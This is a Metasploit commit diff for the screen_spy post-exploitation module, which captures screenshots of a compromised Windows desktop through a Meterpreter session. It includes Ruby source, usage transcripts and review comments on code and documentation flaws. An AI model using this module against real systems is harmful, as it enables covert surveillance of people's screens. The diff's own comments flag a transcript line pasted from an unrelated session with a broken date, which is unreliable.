Update module with more checks and replace the Process migration strategy with a PID migration strategy. Also update documentation accordingly
gwillcox-r7 committed Apr 12, 2021
1 parent 7a828b5 commit 0b06904
Showing 2 changed files with 127 additions and 45 deletions.
122 changes: 106 additions & 16 deletions documentation/modules/post/windows/gather/screen_spy.md
Expand Up @@ -20,27 +20,117 @@ be viewed from the Metasploit interface.

## Options

**SESSION**
### SESSION
The session to run the module on.

The session to run the module on.
### RECORD
If set to true, record all screenshots to disk by saving them to loot.

### PID
PID to migrate into before taking the screenshots. If no PID is specified, default to current PID.

## Scenarios

### Windows 7 (6.1 Build 7601, Service Pack 1).
### Windows 10 20H2 (No Database Connected But RECORD Flag Set)
```
msf6 exploit(multi/handler) > use post/windows/gather/screen_spy
msf6 post(windows/gather/screen_spy) > set SESSION 1
SESSION => 1
msf6 post(windows/gather/screen_spy) > show options
Module options (post/windows/gather/screen_spy):
Name Current Setting Required Description
---- --------------- -------- -----------
COUNT 6 yes Number of screenshots to collect
DELAY 5 yes Interval between screenshots in seconds
PID no PID to migrate into before taking the screenshots
RECORD true yes Record all screenshots to disk by saving them to loot
SESSION 1 yes The session to run this module on.
VIEW_SCREENSHOTS false no View screenshots automatically
msf6 post(windows/gather/screen_spy) > set SESSION 2
SESSION => 2
msf6 post(windows/gather/screen_spy) > run
[*] Capturing 6 screenshots with a delay of 5 seconds
[-] RECORD flag specified however the database is not connected, so no loot can be stored!
[*] Post module execution completed
```

### Windows 10 20H2 (No Database Connected, RECORD flag not set)
```
msf6 exploit(multi/handler) > use post/windows/gather/screen_spy
msf6 post(windows/gather/screen_spy) > set SESSION 2
SESSION => 2
msf6 post(windows/gather/screen_spy) > set RECORD false
RECORD => false
msf6 post(windows/gather/screen_spy) > set VIEW_SCREENSHOTS true
VIEW_SCREENSHOTS => true
msf6 post(windows/gather/screen_spy) > show options
Module options (post/windows/gather/screen_spy):
Name Current Setting Required Description
---- --------------- -------- -----------
COUNT 6 yes Number of screenshots to collect
DELAY 5 yes Interval between screenshots in seconds
PID no PID to migrate into before taking the screenshots
RECORD false yes Record all screenshots to disk by saving them to loot
SESSION 2 yes The session to run this module on.
VIEW_SCREENSHOTS true no View screenshots automatically
msf6 post(windows/gather/screen_spy) > run
[*] Capturing 6 screenshots with a delay of 5 seconds
[*] Screen Spying Complete
[*] Post module execution completed
msf6 post(windows/gather/screen_spy) >
```

### Windows 10 20H2 (No Database Connected, RECORD flag not set, PID set to Process to Migrate To)
```
msf6 exploit(multi/handler) > use post/windows/gather/screen_spy
msf6 post(windows/gather/screen_spy) > set SESSION 2
SESSION => 2
msf6 post(windows/gather/screen_spy) > set RECORD false
RECORD => false
msf6 post(windows/gather/screen_spy) > set VIEW_SCREENSHOTS true
VIEW_SCREENSHOTS => true
msf6 post(windows/gather/screen_spy) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > ps -aux
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
.....
8236 1288 taskhostw.exe
8296 760 svchost.exe
8424 888 RuntimeBroker.exe x64 2 DESKTOP-KUO5CML\test C:\Windows\System32\RuntimeBroker.exe
8572 3340 MeSuAx.exe
8636 760 svchost.exe
8664 8036 putty.exe x64 2 DESKTOP-KUO5CML\test C:\Program Files\PuTTY\putty.exe
.....
```
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.10:49184) at 201 9-12-12 14:55:42 -0700
meterpreter > background
[*] Backgrounding session 2...
msf6 post(windows/gather/screen_spy) > set PID 8664
PID => 8664
msf6 post(windows/gather/screen_spy) > run
[+] Migration successful
[*] Capturing 6 screenshots with a delay of 5 seconds
[*] Screen Spying Complete
[*] Post module execution completed
msf6 post(windows/gather/screen_spy) >
```

msf > use post/windows/gather/screen_spy
msf post(windows/gather/screen_spy) > set SESSION 1
SESSION => 1
msf post(windows/gather/screen_spy) > run
### Windows 10 20H2 (Database Connected, RECORD flag set)
```
[*] Migrating to explorer.exe pid: 1908
[+] Migration successful
[*] Capturing 6 screenshots with a delay of 5 seconds
[*] Screen Spying Complete
[*] run loot -t screenspy.screenshot to see file locations of your newly acquired loot
[*] Post module execution completed
```
```
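Review bot: the third Windows 10 scenario (the one with PID set) has a stray closing fence right after the `ps -aux` listing, so everything from `[*] Meterpreter session 1 opened ...` down to the final prompt renders as plain text instead of as part of the terminal session; drop the fence after the second `.....` so the block runs from `use post/windows/gather/screen_spy` to `msf6 post(windows/gather/screen_spy) >`. That same block carries `[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.10:49184) at 201 9-12-12 14:55:42 -0700`, a line pasted from an unrelated session with a broken date that does not belong in a session 2 walkthrough. The last scenario still shows `[*] Migrating to explorer.exe pid: 1908`, which was output of the removed process-name strategy; the new `migrate` prints only `Migration successful` and only when PID is set, so that transcript should be recaptured with the current module. Minor: the PID option text says "default to current PID", while the code simply skips migration when PID is unset; "the module does not migrate" is the accurate wording.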
50 changes: 21 additions & 29 deletions modules/post/windows/gather/screen_spy.rb
Expand Up @@ -26,7 +26,7 @@ def initialize(info={})
'bannedit', # post module
'kernelsmith <kernelsmith /x40 kernelsmith /x2E com>', # record/loot support,log x approach, nx
'Adrian Kubok', # better record file names
'DLL_Cool_J' # Specify process to migrate into
'DLL_Cool_J' # Specify PID to migrate into
],
'Platform' => ['win'], # @todo add support for posix meterpreter somehow?
'SessionTypes' => ['meterpreter']
Expand All @@ -37,8 +37,8 @@ def initialize(info={})
OptInt.new('DELAY', [true, 'Interval between screenshots in seconds', 5]),
OptInt.new('COUNT', [true, 'Number of screenshots to collect', 6]),
OptBool.new('VIEW_SCREENSHOTS', [false, 'View screenshots automatically', false]),
OptBool.new('RECORD', [true, 'Record all screenshots to disk by looting them', true]),
OptString.new('PROCESS', [false, 'Specify process name to migrate into', ''])
OptBool.new('RECORD', [true, 'Record all screenshots to disk by saving them to loot', true]),
OptString.new('PID', [false, 'PID to migrate into before taking the screenshots', ''])
])
end

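Review bot: `PID` is declared as `OptString` with a default of `''` even though it holds a process id; `OptInt.new('PID', [false, 'PID to migrate into before taking the screenshots'])` would let the framework reject non-numeric input at `set` time instead of letting `datastore['PID'].to_i` silently turn a typo into pid 0 later in `migrate`, and the presence test in `run` then becomes a plain nil check rather than a comparison against the empty string.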
Expand All @@ -50,18 +50,12 @@ def record?
datastore['RECORD']
end

def process?
datastore['PROCESS']
end



def run
host = session.session_host
screenshot = Msf::Config.get_config_root + "/logs/" + host + ".jpg"

# if no process is specified, don't migrate.
if datastore['PROCESS'] != ''
# If no PID is specified, don't migrate.
if datastore['PID'] != ''
migrate
end

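Review bot: the guard `if datastore['PID'] != ''` only holds while PID stays an `OptString` whose default is exactly `''`; a nil or whitespace-only value is not equal to `''` and sends the module into `migrate` with `to_i` yielding 0. `unless datastore['PID'].to_s.strip.empty?` covers those cases and keeps working if the option type is later changed. Dropping the now-unused `process?` helper while keeping `record?` is correct.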
Expand Down Expand Up @@ -92,11 +86,15 @@ def run
return false
end
if data

if record?
# let's loot it using non-clobbering filename, even tho this is the source filename, not dest
fn = "screenshot.%0#{leading_zeros}d.jpg" % num
file_locations << store_loot("screenspy.screenshot", "image/jpg", session, data, fn, "Screenshot")
if framework.db.active
# let's loot it using non-clobbering filename, even tho this is the source filename, not dest
fn = "screenshot.%0#{leading_zeros}d.jpg" % num
file_locations << store_loot("screenspy.screenshot", "image/jpg", session, data, fn, "Screenshot")
else
print_error('RECORD flag specified however the database is not connected, so no loot can be stored!')
return false
end
end

# also write to disk temporarily so we can display in browser.
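Review bot: the `framework.db.active` check sits inside the per-screenshot loop, after the first screenshot has already been captured, so with `RECORD` set and no database the module waits out one capture and then leaves `run` with a bare `return false` (the documentation scenario shows exactly this sequence: `Capturing 6 screenshots...` followed by the RECORD error). Move the check to the top of `run`, before any capture or migration, and report it with `fail_with(Failure::BadConfig, ...)` so the failure surfaces the same way as the `migrate` path; the `print_error` inside the loop is otherwise only ever reachable on the first iteration.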
Expand All @@ -121,7 +119,7 @@ def run
return
end
print_status("Screen Spying Complete")
if file_locations and not file_locations.empty?
if record? && file_locations and not file_locations.empty?
print_status "run loot -t screenspy.screenshot to see file locations of your newly acquired loot"
end

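Review bot: `if record? && file_locations and not file_locations.empty?` mixes `&&` with the low-precedence `and`/`not`, which parses as `(record? && file_locations) and (not file_locations.empty?)` and happens to work but is exactly what Rubocop's Style/AndOr flags; `if record? && file_locations && !file_locations.empty?` reads unambiguously. `record?` is also redundant here, since `file_locations` is only appended to inside the `if record?` branch above.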
Expand All @@ -140,19 +138,13 @@ def run
end

def migrate
pid = session.sys.process.getpid
session.sys.process.get_processes.each do |p|
if p['name'] == datastore['PROCESS'] and p['pid'] != pid
print_status("Migrating to #{datastore['PROCESS']} pid: #{p['pid']}")
begin
session.core.migrate(p['pid'].to_i)
print_good("Migration successful")
return p['pid']
rescue
print_bad("Migration failed")
return nil
end
end
begin
session.core.migrate(datastore['PID'].to_i)
print_good("Migration successful")
return datastore['PID']
rescue
fail_with(Failure::Unknown, "Migration failed! Unable to take a screenshot under the desired process!")
return nil
end
end
end
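Review bot: `return nil` after `fail_with` in the rescue branch is unreachable, since `fail_with` raises, and the `return datastore['PID']` on success is never consumed by `run`, so both returns can go. The old implementation skipped its own pid (`p['pid'] != pid`) and announced the target with `print_status("Migrating to ...")`; the new one does neither, so a user who sets PID to the current process gets only the generic `Migration failed!` message. Compare `datastore['PID'].to_i` against `session.sys.process.getpid` before calling `session.core.migrate`, print the target pid beforehand, and rescue as `rescue => e` so the `fail_with` text can include `e.message` and tell the user why migration was refused rather than only that it was.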
